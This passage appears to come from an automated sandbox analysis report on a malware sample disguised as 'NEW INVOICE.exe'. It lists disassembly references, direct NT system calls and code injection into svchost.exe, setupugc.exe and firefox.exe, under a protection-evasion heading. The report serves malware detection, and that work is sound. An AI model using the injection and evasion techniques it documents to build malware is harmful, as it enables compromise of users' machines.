            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]2_2_033EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]2_2_033304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]2_2_0335EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]2_2_033F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]2_2_03402B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]2_2_033AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404B00 mov eax, dword ptr fs:[00000030h]2_2_03404B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]2_2_0332CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328B50 mov eax, dword ptr fs:[00000030h]2_2_03328B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]2_2_033DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]2_2_033E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]2_2_033C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]2_2_033FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]2_2_033D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]2_2_03340BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]2_2_033E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]2_2_03338BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]2_2_0335EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]2_2_033BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]2_2_033DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]2_2_0336CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]2_2_0336CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]2_2_0335EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]2_2_033BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]2_2_033DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]2_2_03386AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]2_2_03368A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]2_2_03404A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]2_2_03330AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404940 mov eax, dword ptr fs:[00000030h]2_2_03404940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]2_2_033B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]2_2_033C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]2_2_033BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]2_2_033BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]2_2_033B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]2_2_033BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]2_2_033649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]2_2_033FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]2_2_033C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]2_2_0336A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]2_2_033BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]2_2_033BE872
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\setupugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeThread register set: target process: 6000Jump to behavior
